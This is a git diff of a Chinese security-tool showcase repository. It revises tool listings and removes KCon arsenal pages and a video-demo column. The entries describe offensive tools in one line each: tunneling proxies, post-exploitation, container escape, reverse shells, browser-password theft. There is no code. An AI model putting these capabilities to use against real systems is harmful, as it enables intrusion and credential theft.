-![Version](https://img.shields.io/badge/Version-V0.2.3-red)
-
-<https://github.com/Mob2003/rakshasa>
-
-rakshasa是一个使用Go语言编写的强大多级代理工具，专为实现多级代理，内网穿透而设计。它可以在节点群里面任意两个节点之间转发TCP请求和响应，同时支持socks5代理，http代理，并且可以引入外部http、socks5代理池，自动切换请求IP。
-
 ### [As-Exploits](detail/As-Exploits.md)
 ![Author](https://img.shields.io/badge/Author-yzddmr6-orange)
 ![Language](https://img.shields.io/badge/Language-JavaScript-blue)
@@ -677,78 +353,28 @@ rakshasa是一个使用Go语言编写的强大多级代理工具，专为实现
 
 中国蚁剑后渗透框架
 
-### [PortForward](detail/PortForward.md)
-![Author](https://img.shields.io/badge/Author-knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/PortForward.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.5.0-red)
-
-<https://github.com/knownsec/PortForward>
-
-PortForward 是使用 Golang 进行开发的端口转发工具，解决在某些场景下内外网无法互通的问题
-
 
 
 ## 其他/others
-### [f8x](detail/f8x.md)
-![Author](https://img.shields.io/badge/Author-ffffffff0x-orange)
-![Language](https://img.shields.io/badge/Language-Bash-blue)
-![GitHub stars](https://img.shields.io/github/stars/ffffffff0x/f8x.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.6.2-red)
-
-<https://github.com/ffffffff0x/f8x>
-
-一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等。
-
-### [BinAbsInspector](detail/BinAbsInspector.md)
-![Author](https://img.shields.io/badge/Author-KeenSecurityLab-orange)
-![Language](https://img.shields.io/badge/Language-Java-blue)
-![GitHub stars](https://img.shields.io/github/stars/KeenSecurityLab/BinAbsInspector.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.1-red)
-
-<https://github.com/KeenSecurityLab/BinAbsInspector>
-
-BinAbsInspector(Binary Abstract Inspector)是一款用于自动化逆向工程和扫描二进制文件漏洞的静态分析器，是 Keenlab 孵化的长期研究项目。基于 Ghidra 的支持下的抽象解释，适用于 Ghidra 的 Pcode 而非汇编。目前支持 x86、x64、armv7 和 aarch64 的二进制文件。
-
 ### [passive-scan-client](detail/passive-scan-client.md)
 ![Author](https://img.shields.io/badge/Author-c0ny1-orange)
 ![Language](https://img.shields.io/badge/Language-Java-blue)
 ![GitHub stars](https://img.shields.io/github/stars/c0ny1/passive-scan-client.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.3.1-red)
+![Version](https://img.shields.io/badge/Version-V0.3.0-red)
 
 <https://github.com/c0ny1/passive-scan-client>
 
 Passive Scan Client是一款可以将经过筛选的流量转发到指定代理的Burp被动扫描流量转发插件
 
-### [Heimdallr](detail/Heimdallr.md)
-![Author](https://img.shields.io/badge/Author-graynjo-orange)
-![Language](https://img.shields.io/badge/Language-JavaScript-blue)
-![GitHub stars](https://img.shields.io/github/stars/graynjo/Heimdallr.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.1.3-red)
-
-<https://github.com/graynjo/Heimdallr>
-
-一款完全被动监听的谷歌插件，用于高危指纹识别、蜜罐特征告警和拦截、机器特征对抗。
-
-### [wam](detail/wam.md)
-![Author](https://img.shields.io/badge/Author-knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/wam.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0-red)
-
-<https://github.com/knownsec/wam>
-
-WAM是一个由Python开发的用于监控'Web App'、'动态网络信息'的平台。在一定程度上，它极大地帮助安全研究人员节省了跟踪代码补丁的时间。
-
-### [LBot](detail/LBot.md)
-![Author](https://img.shields.io/badge/Author-LoRexxar@knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/LBot.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
+### [f8x](detail/f8x.md)
+![Author](https://img.shields.io/badge/Author-ffffffff0x-orange)
+![Language](https://img.shields.io/badge/Language-Bash-blue)
+![GitHub stars](https://img.shields.io/github/stars/ffffffff0x/f8x.svg?style=flat&logo=github)
+![Version](https://img.shields.io/badge/Version-V1.5.7-red)
 
-<https://github.com/knownsec/LBot>
+<https://github.com/ffffffff0x/f8x>
 
-LBot主要用于方便的编写一个xss的bot程序。使用者可以简单的修改其逻辑以及配置环境，即可获得一个简单的xss的bot程序。由于原型来自于爬虫程序，所以只要前端有一定的频率限制，后端很难出现问题，比较稳定。
+一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等。
 
 
 
diff --git a/banner.md b/banner.md
index 5e35c85b0..3a62e9d83 100644
--- a/banner.md
+++ b/banner.md
@@ -6,26 +6,26 @@
 
 ```
 ## 404星链计划
-<img src="https://github.com/knownsec/404StarLink/raw/master/Images/logo.png" width="30%">
+<img src="https://github.com/knownsec/404StarLink-Project/raw/master/logo.png" width="30%">
 
-(项目名称) 现已加入 [404星链计划](https://github.com/knownsec/404StarLink)
+(项目名称) 现已加入 [404星链计划](https://github.com/knownsec/404StarLink2.0-Galaxy)
 ```
 
 ## 404星链计划
-<img src="https://github.com/knownsec/404StarLink/raw/master/Images/logo.png" width="30%">
+<img src="https://github.com/knownsec/404StarLink-Project/raw/master/logo.png" width="30%">
 
-AAAA 现已加入 [404星链计划](https://github.com/knownsec/404StarLink)
+AAAA 现已加入 [404星链计划](https://github.com/knownsec/404StarLink2.0-Galaxy)
 
 **英文版本**  
 
 ```
 ## 404Starlink
-<img src="https://github.com/knownsec/404StarLink/raw/master/Images/logo.png" width="30%">
+<img src="https://github.com/knownsec/404StarLink-Project/raw/master/logo.png" width="30%">
 
-(ProjectName) has joined [404Starlink](https://github.com/knownsec/404StarLink)
+(ProjectName) has joined [404Starlink](https://github.com/knownsec/404StarLink2.0-Galaxy)
 ```
 
 ## 404Starlink
-<img src="https://github.com/knownsec/404StarLink/raw/master/Images/logo.png" width="30%">
+<img src="https://github.com/knownsec/404StarLink-Project/raw/master/logo.png" width="30%">
 
-AAAA has joined [404Starlink](https://github.com/knownsec/404StarLink)
\ No newline at end of file
+AAAA has joined [404Starlink](https://github.com/knownsec/404StarLink2.0-Galaxy)
\ No newline at end of file
diff --git a/column/2021KCon_exhibition_with_starlink.md b/column/2021KCon_exhibition_with_starlink.md
index 7c325219f..e047a93a0 100644
--- a/column/2021KCon_exhibition_with_starlink.md
+++ b/column/2021KCon_exhibition_with_starlink.md
@@ -1,9 +1,9 @@
-## 入选2021Kcon黑客大会兵器谱
+## 入选2021Kcon安全会议兵器谱
 
 KCon 黑客大会由知道创宇主办，秉持着追求干货、乐于分享的精神，力求为每一位热爱黑客技术研究的伙伴打造一个尽情展示、互动交流的创意舞台。如今，历经十年打磨，KCon 黑客大会已成长为国际网络安全圈极富活力与影响力的前沿网络安全攻防技术交流平台。本届 KCon 选择以“纵横”为主题，十之一纵一横，包罗万象，正如网络空间的攻与防，变幻莫测。而纵横之下的这场网安论道，将以打造全球性网安交流平台为发展目标，加速强化中国网安力量。
 
 <div align="center">
-<img src="Images_2021KCon/1.jpeg" width="700">
+<img src="Images/2021KCon_exhibition_with_starlink_1.jpeg" width="700">
 </div>
 
 详情可以访问: <http://kcon.knownsec.com/2021/#/>
@@ -13,7 +13,7 @@ KCon 黑客大会由知道创宇主办，秉持着追求干货、乐于分享的
 今年，在历时两个多月的招募与评选后，我们精心为大家挑选出了 11 件安全江湖的“神兵利器”，将于 KCon 现场尽情探索与展示！
 
 <div align="center">
-<img src="Images_2021KCon/2.jpeg" width="400">
+<img src="Images/2021KCon_exhibition_with_starlink_2.jpeg" width="400">
 </div>
 
 详情可以访问: <http://kcon.knownsec.com/2021/#/arsenal>
@@ -43,7 +43,7 @@ KCon 黑客大会由知道创宇主办，秉持着追求干货、乐于分享的
 CDK是一款为容器环境定制的渗透测试工具，在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的逃逸、横向移动、持久化利用方式，插件化管理。
 
 <div align="center">
-<img src="Images_2021KCon/cdk.png" width="700">
+<img src="Images/2021KCon_exhibition_with_starlink_cdk.png" width="700">
 </div>
 
 
@@ -52,12 +52,10 @@ CDK是一款为容器环境定制的渗透测试工具，在已攻陷的容器
 ![Language](https://img.shields.io/badge/Language-Python-blue)
 ![GitHub stars](https://img.shields.io/github/stars/knownsec/Kunyu.svg?style=flat&logo=github)
 
-<https://github.com/knownsec/Kunyu>
-
 Kunyu 是基于 ZoomEye 开发的工具，旨在让企业资产梳理更加高效，使更多安全从业者了解、使用网络空间测绘技术。
 
 <div align="center">
-<img src="Images_2021KCon/kunyu.png" width="700">
+<img src="Images/2021KCon_exhibition_with_starlink_kunyu.png" width="700">
 </div>
 
 
@@ -71,7 +69,7 @@ Kunyu 是基于 ZoomEye 开发的工具，旨在让企业资产梳理更加高
 一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等。
 
 <div align="center">
-<img src="Images_2021KCon/f8x.png" width="700">
+<img src="Images/2021KCon_exhibition_with_starlink_f8x.png" width="700">
 </div>
 
 
@@ -85,7 +83,7 @@ Kunyu 是基于 ZoomEye 开发的工具，旨在让企业资产梳理更加高
 VIPER是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化。
 
 <div align="center">
-<img src="Images_2021KCon/viper.jpg" width="700">
+<img src="Images/2021KCon_exhibition_with_starlink_viper.jpg" width="700">
 </div>
 
 
@@ -99,7 +97,7 @@ VIPER是一款图形化内网渗透工具,将内网渗透过程中常用的战
 Kunlun-Mirror 专注于安全研究人员使用的白盒代码审计工具
 
 <div align="center">
-<img src="Images_2021KCon/kunlun.png" width="700">
+<img src="Images/2021KCon_exhibition_with_starlink_kunlun.png" width="700">
 </div>
 
 
@@ -113,7 +111,7 @@ Kunlun-Mirror 专注于安全研究人员使用的白盒代码审计工具
 Pocassist 是一个 Golang 编写的全新开源漏洞测试框架，帮助安全人员专注于漏洞验证的逻辑的实现。Pocassist 提供了简洁的 Web 图形化界面，用户可以在线编辑漏洞验证程序即可进行批量的测试；规则完全兼容 xray，可以直接使用现有开源的 PoC 库，同时也支持添加自定义规则。
 
 <div align="center">
-<img src="Images_2021KCon/pocassist.jpg" width="700">
+<img src="Images/2021KCon_exhibition_with_starlink_pocassist.jpg" width="700">
 </div>
 
 
@@ -127,19 +125,20 @@ Pocassist 是一个 Golang 编写的全新开源漏洞测试框架，帮助安
 Stowaway 是一款多级代理工具，可将外部流量通过多个节点代理至内网，突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃，从外部dmz等一系列区域逐步深入核心网络；Stowaway 除了流量转发功能，还提供了端口复用、ssh隧道，流量伪装等专为渗透测试人员所用的功能。
 
 <div align="center">
-<img src="Images_2021KCon/stowaway.png" width="700">
+<img src="Images/2021KCon_exhibition_with_starlink_stowaway.png" width="700">
 </div>
 
 
-### [GShark](../detail/gshark.md)
+### [gshark](../detail/gshark.md)
 ![Author](https://img.shields.io/badge/Author-madneal-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
 ![GitHub stars](https://img.shields.io/github/stars/madneal/gshark.svg?style=flat&logo=github)
+![Version](https://img.shields.io/badge/Version-V0.8.4-red)
 
 <https://github.com/madneal/gshark>
 
 一款开源敏感信息监测系统，可以监测包括 github、gitlab(目前不太稳定，由于gitlab对于免费用户不提供代码全文检索API)、searchcode 多平台的敏感信息监测。
 
 <div align="center">
-<img src="Images_2021KCon/gshark.png" width="700">
+<img src="Images/2021KCon_exhibition_with_starlink_gshark.png" width="700">
 </div>
diff --git a/column/2022KCon_exhibition_with_starlink.md b/column/2022KCon_exhibition_with_starlink.md
deleted file mode 100644
index 827ed17db..000000000
--- a/column/2022KCon_exhibition_with_starlink.md
+++ /dev/null
@@ -1,129 +0,0 @@
-## 入选2022KCon黑客大会兵器谱
-
-2022年是 KCon 黑客大会举办的第11个年头，亦是10年圆满后踏上新征程的第1步，主题为“**+1 进阶，护航未来**”。
-
-“+1”或许并不起眼，但“不积跬步，无以至千里；不积小流，无以成江海”。众多“+1”汇聚，便能以量变引起质变，化不可能为可能。网络空间发展至今，机遇与威胁并存，攻击与防守互搏。护航网络空间的未来发展之路，需要聚力成盾，这凝聚着安全技术人员每一次 **“+1”的修复、“+1”的努力、“+1”的创新、“+1”的突破**。
-
-KCon黑客大会，汇聚黑客智慧，专注网络攻防技术交流。我们希望为众多“+1”的探索者提供分享与碰撞的舞台，为网络安全的进阶助力。
-
-<div align="center">
-<img src="Images_2022KCon/1.png" width="700">
-</div>
-
-详情访问：[KCon 2022 - KCon 黑客大会](https://kcon.knownsec.com/list-kcon2022.html)
-
-众所周知，网络实战攻防离不开各类自动化工具的运用。安全自动化工具是网安研究人员脑力和经验的结晶，它的加持能让安全人员从“白打”升级到全副武装状态，帮助展示及处理诸多复杂、耗时的安全问题，明确风险、提升效率、加强防御。
-
-KCon「兵器谱」展示便是为鼓励国内安全自动化工具的发展而设立，现已成为每届 KCon 的传统。本届 KCon，有**14**件经过精心筛选的安全“兵器”等待大家探索。
-
-<div align="center">
-<img src="Images_2022KCon/2.png" width="700">
-</div>
-
-其中有 7 个项目来自404星链计划，他们分别是：
-
-- AppInfoScanner
-- As-Exploits
-- Cloud-Bucket-Leak-Detection-Tools
-- fscan
-- HaE
-- openstar
-- veinmind-tools
-
->排名不分先后
-
-
-### [AppInfoScanner](https://github.com/knownsec/404StarLink/blob/master/detail/AppInfoScanner.md)
-
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![Author](https://img.shields.io/badge/Author-kelvinBen-orange)
-![GitHub stars](https://img.shields.io/github/stars/kelvinBen/AppInfoScanner.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0.8-red)
-
-https://github.com/kelvinBen/AppInfoScanner
-
-一款适用于以HW行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具，可以帮助渗透测试工程师、攻击队成员、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如：Title、Domain、CDN、指纹信息、状态信息等。
-
-[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1Mt4y1J7Vh?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
-
-
-### [As-Exploits](https://github.com/knownsec/404StarLink/blob/master/detail/As-Exploits.md)
-
-![Author](https://img.shields.io/badge/Author-yzddmr6-orange)
-![Language](https://img.shields.io/badge/Language-JavaScript-blue)
-![GitHub stars](https://img.shields.io/github/stars/yzddmr6/As-Exploits.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0.0-red)
-
-https://github.com/yzddmr6/As-Exploits
-
-中国蚁剑后渗透框架
-
-
-### [Cloud-Bucket-Leak-Detection-Tools](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools)
-
-![Author](https://img.shields.io/badge/Author-UzJu-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/UzJu/Cloud-Bucket-Leak-Detection-Tools.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.4.0-red)
-
-https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools
-
-云原生安全近几年比较火，存储桶在企业(SRC众测)中暴露的问题也非常多，不仅仅局限于AK/SK的泄露，更多的是用户配置侧的问题，这款工具就是用来代替我们手工解决一些繁琐的操作。
-
-[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1ye411g76v?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
-
-
-### [fscan](https://github.com/knownsec/404StarLink/blob/master/detail/fscan.md)
-
-![Author](https://img.shields.io/badge/Author-shadow1ng-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/shadow1ng/fscan.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.8.1-red)
-
-https://github.com/shadow1ng/fscan
-
-一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
-
-[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1vG4115722?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
-
-
-### [HaE](https://github.com/knownsec/404StarLink/blob/master/detail/HaE.md)
-
-![Author](https://img.shields.io/badge/Author-gh0stkey-orange)
-![Language](https://img.shields.io/badge/Language-Java-blue)
-![GitHub stars](https://img.shields.io/github/stars/gh0stkey/HaE.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.4.2-red)
-
-https://github.com/gh0stkey/HaE
-
-HaE是一款可以快速挖掘目标指纹和关键信息的Burp插件。
-
-[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV16D4y167uX?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
-
-
-### [OpenStar](https://github.com/knownsec/404StarLink/blob/master/detail/OpenStar.md)
-
-![Author](https://img.shields.io/badge/Author-starjun-orange)
-![Language](https://img.shields.io/badge/Language-JS/Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/starjun/openstar.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0.0-red)
-
-https://github.com/starjun/openstar
-
-OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙，支持复杂规则编写。提供了常规的 HTTP 字段规则配置，还提供了 IP 黑白名单、访问频次等配置，对于 CC 防护更提供的特定的规则算法，并且支持搭建集群进行防护。
-
-[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1YB4y1G7mr?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
-
-
-### [veinmind-tools](https://github.com/knownsec/404StarLink/blob/master/detail/veinmind-tools.md)
-
-![Author](https://img.shields.io/badge/Author-长亭科技-orange)
-![Language](https://img.shields.io/badge/Language-Golang/Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.5.0-red)
-
-https://github.com/chaitin/veinmind-tools
-
-veinmind-tools 是基于 veinmind-sdk 打造的一个容器安全工具集，目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描，更多功能正在逐步开发中。
-
-[点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1MP411V7v6?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047)
diff --git a/column/2023KCon_exhibition_with_starlink.md b/column/2023KCon_exhibition_with_starlink.md
deleted file mode 100644
index e10feccdd..000000000
--- a/column/2023KCon_exhibition_with_starlink.md
+++ /dev/null
@@ -1,73 +0,0 @@
-## 入选2023KCon黑客大会兵器谱
-
-KCon大会，国际网络安全圈富有活力与影响力的前沿网络安全攻防技术交流平台，以“追求干货有趣”为宗旨，力求为网安技术研究者们打造一个尽情展示、尽情交流的创意舞台，期待以技术之力引领业界未来的变革。
-
-在数字化浪潮奔腾汹涌的当下，数字的汇聚引起AI的“智变”，也引起了更多值得被关注的网络安全风险。安全是发展的前提，网络安全技术的创新与进步是数字中国建设的重要支撑。
-
-因此，本届KCon大会着眼数智时代的网安风险，以 **“归源·智变”** 为主题，意在以技术初心凝聚行业之力，为护航数智时代的安全发展贡献绵薄之力。
-
-<div align="center">
-<img src="Images_2023KCon/1.jpeg" width="700">
-</div>
-
-详情访问：[KCon 2023 - KCon 黑客大会](https://kcon.knownsec.com/list-kcon2023.html)
-
-网络空间的实战攻防离不开各类自动化工具的运用。这些工具就如同网安战场上的“兵器”，可以为安全人员进行“全副武装”，帮助展示及处理诸多复杂、耗时的安全问题，明确风险、提升效率、加强防御。
-
-AI大模型的横空出世，带来了新一轮技术工具的进化热潮，网络安全行业也纷纷跟进。KCon一直聚焦当下前沿的研究方向与工具技术，「兵器谱」展示环节便是为了鼓励国内安全自动化工具发展而设立。
-
-在KCon 2023的大会现场，10件由大众评选出的安全神兵利器将同台亮相展区，等待大家的探索。“锻造”出这些“兵器”的网安巧匠也将在展示区为大家讲解演示，传授使用“秘籍”。
-
-<div align="center">
-<img src="Images_2023KCon/2.png" width="700">
-</div>
-
-其中有 3 个项目来自404星链计划，他们分别是：
-
-- Hades
-- ENScanGo
-- CF
-
->排名不分先后
-
-### [Hades](https://github.com/knownsec/404StarLink/blob/master/detail/Hades.md)
-
-![Language](https://img.shields.io/badge/Language-Golang&C++&C-blue)
-![Author](https://img.shields.io/badge/Author-theSecHunter-orange)
-![GitHub stars](https://img.shields.io/github/stars/theSecHunter/Hades.svg?style=flat&logo=github)
-
-https://github.com/theSecHunter/Hades
-
-Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统，其中每个插件均可独立分开运行。
-
-<div align="center">
-<img src="Images_2023KCon/hades.png" width="700">
-</div>
-
-### [ENScanGo](https://github.com/knownsec/404StarLink/blob/master/detail/ENScanGo.md)
-
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![Author](https://img.shields.io/badge/Author-wgpsec-orange)
-![GitHub stars](https://img.shields.io/github/stars/wgpsec/ENScan_GO.svg?style=flat&logo=github)
-
-https://github.com/wgpsec/ENScan_GO
-
-剑指HW/SRC，解决在HW/SRC场景下遇到的各种针对国内企业信息收集难题。
-
-<div align="center">
-<img src="Images_2023KCon/enscango.png" width="700">
-</div>
-
-### [CF](https://github.com/knownsec/404StarLink/blob/master/detail/cf.md)
-
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![Author](https://img.shields.io/badge/Author-teamssix-orange)
-![GitHub stars](https://img.shields.io/github/stars/teamssix/cf.svg?style=flat&logo=github)
-
-https://github.com/teamssix/cf
-
-CF 是一个云环境利用框架，适用于在红队场景中对云上内网进行横向、SRC 场景中对 Access Key 即访问凭证的影响程度进行判定、企业场景中对自己的云上资产进行自检等等。
-
-<div align="center">
-<img src="Images_2023KCon/cf.png" width="700">
-</div>
\ No newline at end of file
diff --git a/column/Images_2021KCon/1.jpeg b/column/Images/2021KCon_exhibition_with_starlink_1.jpeg
similarity index 100%
rename from column/Images_2021KCon/1.jpeg
rename to column/Images/2021KCon_exhibition_with_starlink_1.jpeg
diff --git a/column/Images_2021KCon/2.jpeg b/column/Images/2021KCon_exhibition_with_starlink_2.jpeg
similarity index 100%
rename from column/Images_2021KCon/2.jpeg
rename to column/Images/2021KCon_exhibition_with_starlink_2.jpeg
diff --git a/column/Images_2021KCon/cdk.png b/column/Images/2021KCon_exhibition_with_starlink_cdk.png
similarity index 100%
rename from column/Images_2021KCon/cdk.png
rename to column/Images/2021KCon_exhibition_with_starlink_cdk.png
diff --git a/column/Images_2021KCon/f8x.png b/column/Images/2021KCon_exhibition_with_starlink_f8x.png
similarity index 100%
rename from column/Images_2021KCon/f8x.png
rename to column/Images/2021KCon_exhibition_with_starlink_f8x.png
diff --git a/column/Images_2021KCon/gshark.png b/column/Images/2021KCon_exhibition_with_starlink_gshark.png
similarity index 100%
rename from column/Images_2021KCon/gshark.png
rename to column/Images/2021KCon_exhibition_with_starlink_gshark.png
diff --git a/column/Images_2021KCon/kunlun.png b/column/Images/2021KCon_exhibition_with_starlink_kunlun.png
similarity index 100%
rename from column/Images_2021KCon/kunlun.png
rename to column/Images/2021KCon_exhibition_with_starlink_kunlun.png
diff --git a/column/Images_2021KCon/kunyu.png b/column/Images/2021KCon_exhibition_with_starlink_kunyu.png
similarity index 100%
rename from column/Images_2021KCon/kunyu.png
rename to column/Images/2021KCon_exhibition_with_starlink_kunyu.png
diff --git a/column/Images_2021KCon/pocassist.jpg b/column/Images/2021KCon_exhibition_with_starlink_pocassist.jpg
similarity index 100%
rename from column/Images_2021KCon/pocassist.jpg
rename to column/Images/2021KCon_exhibition_with_starlink_pocassist.jpg
diff --git a/column/Images_2021KCon/stowaway.png b/column/Images/2021KCon_exhibition_with_starlink_stowaway.png
similarity index 100%
rename from column/Images_2021KCon/stowaway.png
rename to column/Images/2021KCon_exhibition_with_starlink_stowaway.png
diff --git a/column/Images_2021KCon/viper.jpg b/column/Images/2021KCon_exhibition_with_starlink_viper.jpg
similarity index 100%
rename from column/Images_2021KCon/viper.jpg
rename to column/Images/2021KCon_exhibition_with_starlink_viper.jpg
diff --git a/column/Images_2022KCon/1.png b/column/Images_2022KCon/1.png
deleted file mode 100644
index 1336c2d40..000000000
Binary files a/column/Images_2022KCon/1.png and /dev/null differ
diff --git a/column/Images_2022KCon/2.png b/column/Images_2022KCon/2.png
deleted file mode 100644
index 369554efb..000000000
Binary files a/column/Images_2022KCon/2.png and /dev/null differ
diff --git a/column/Images_2023KCon/1.jpeg b/column/Images_2023KCon/1.jpeg
deleted file mode 100644
index 6641ccbb2..000000000
Binary files a/column/Images_2023KCon/1.jpeg and /dev/null differ
diff --git a/column/Images_2023KCon/2.png b/column/Images_2023KCon/2.png
deleted file mode 100644
index d21c2c463..000000000
Binary files a/column/Images_2023KCon/2.png and /dev/null differ
diff --git a/column/Images_2023KCon/cf.png b/column/Images_2023KCon/cf.png
deleted file mode 100644
index c62e5bb66..000000000
Binary files a/column/Images_2023KCon/cf.png and /dev/null differ
diff --git a/column/Images_2023KCon/enscango.png b/column/Images_2023KCon/enscango.png
deleted file mode 100644
index 3b58c26b1..000000000
Binary files a/column/Images_2023KCon/enscango.png and /dev/null differ
diff --git a/column/Images_2023KCon/hades.png b/column/Images_2023KCon/hades.png
deleted file mode 100644
index 8aada40d3..000000000
Binary files a/column/Images_2023KCon/hades.png and /dev/null differ
diff --git a/column/starlink_project_video.md b/column/starlink_project_video.md
deleted file mode 100644
index c881500f6..000000000
--- a/column/starlink_project_video.md
+++ /dev/null
@@ -1,38 +0,0 @@
-## 星际奇兵
-
-「星际奇兵」是知道创宇404实验室“星链计划”下的开源安全工具视频演示栏目，本栏目对项目进行细致的演示指导，陆续更新中。跟我们一起快速上手这些优秀的安全工具吧！
-
-以下账号同步更新，欢迎关注：
-
-B站：知道创宇404实验室  
-Weibo/微信公众号：Seebug漏洞平台
-
-**第一期演示项目：[KunLun-M](https://github.com/LoRexxar/Kunlun-M)**  
-自动化代码审计工具，有它一个就够了！——404星链计划KunLun-M
-https://www.bilibili.com/video/BV15a411G7CT
-
-**第二期演示项目：[HackBrowserData](https://github.com/moonD4rk/HackBrowserData)**  
-小心！这个工具可以窃取你的浏览器密码！——404星链计划HackBrowserData
-https://www.bilibili.com/video/BV1eU4y1z7si
-
-**第三期演示项目：[antSword](https://github.com/AntSwordProject/antSword)**  
-搞安全绝不能错过的跨平台网站管理工具——404星链计划antSword
-https://www.bilibili.com/video/BV1Jg411h7Pj
-
-**第四期演示项目：[CDK](https://github.com/cdk-team/CDK)**  
-Github高赞工具，渗透测试er看过来——404星链计划CDK  
-https://www.bilibili.com/video/BV1DG4y1Z784/
-
-**第五期演示项目：[fscan](https://github.com/shadow1ng/fscan)**  
-【安全工具】5大功能，一键化内网扫描神器——404星链计划fscan  
-https://www.bilibili.com/video/BV1Cv4y1R72M
-
-**第六期演示项目：[Viper](https://github.com/FunnyWolf/Viper)**  
-【安全工具】集成70+模块，红队内网渗透必备——404星链计划Viper  
-https://www.bilibili.com/video/BV1zv4y1s7xv
-
-**第七期演示项目：[Pocsuite3](https://github.com/knownsec/pocsuite3)**  
-【安全工具】必备神器！开源远程漏洞测试框架——404星链计划Pocsuite3  
-https://www.bilibili.com/video/BV1gz4y1E7j1
-
-**持续更新中……**
\ No newline at end of file
diff --git a/detail/Antenna.md b/detail/Antenna.md
deleted file mode 100644
index 6abfa1466..000000000
--- a/detail/Antenna.md
+++ /dev/null
@@ -1,143 +0,0 @@
-## Antenna <https://github.com/wuba/Antenna>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![Author](https://img.shields.io/badge/Author-wuba-orange)
-![GitHub stars](https://img.shields.io/github/stars/wuba/Antenna.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.3.5-red)
-![Time](https://img.shields.io/badge/Join-20220914-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-Antenna是58同城安全团队打造的一款辅助安全从业人员辅助验证网络中多种漏洞是否存在以及可利用性的工具。其基于带外应用安全测试(
-OAST)通过任务的形式，将不同漏洞场景检测能力通过插件的形式进行集合，通过与目标进行Out-of-bind的数据通信方式进行辅助检测。
-
-## Antenna的目标
-
-我们绝不仅仅只是将Antenna做成一款只能监听DNS、HTTP等协议来简单判断无回显类型漏洞的工具，我们的目标是尝试在良好使用体验的基础上支持高度灵活的自定义组件能力，满足用户通过Antenna探索并实现各种应用安全漏洞场景的辅助检测。尽可能得实现通过Antenna这款产品降低各种安全漏洞场景的检测成本。
-
-## 相关网站
-
-博客(已开放)：[Antenna 博客](http://blog.antenna.cool/docs/intro)
-
-演示平台(暂时关闭)：[演示平台](http://jiemuzu.cn)
-
-漏洞靶场(已支持docker部署,docker-compose文件在项目docker目录中)
-：[lcttty/antenna-range:0.0.1](https://github.com/wuba/Antenna/blob/main/docker/docker-compose-range.yaml)
-
-## Antenna_Inside计划
-
-在我们开发Antenna时，就希望能够支持现有市场上流行的漏洞扫描工具漏洞结果回调与主动查询
-,所以我们推出了CallBack与OpenAPI。为了让我们的这两个模块能够更加灵活与优雅。我们决定发起
-Antenna_Inside计划，如果您是使用扫描工具的用户或者作者请联系我们，我们会无条件支持您的项目与
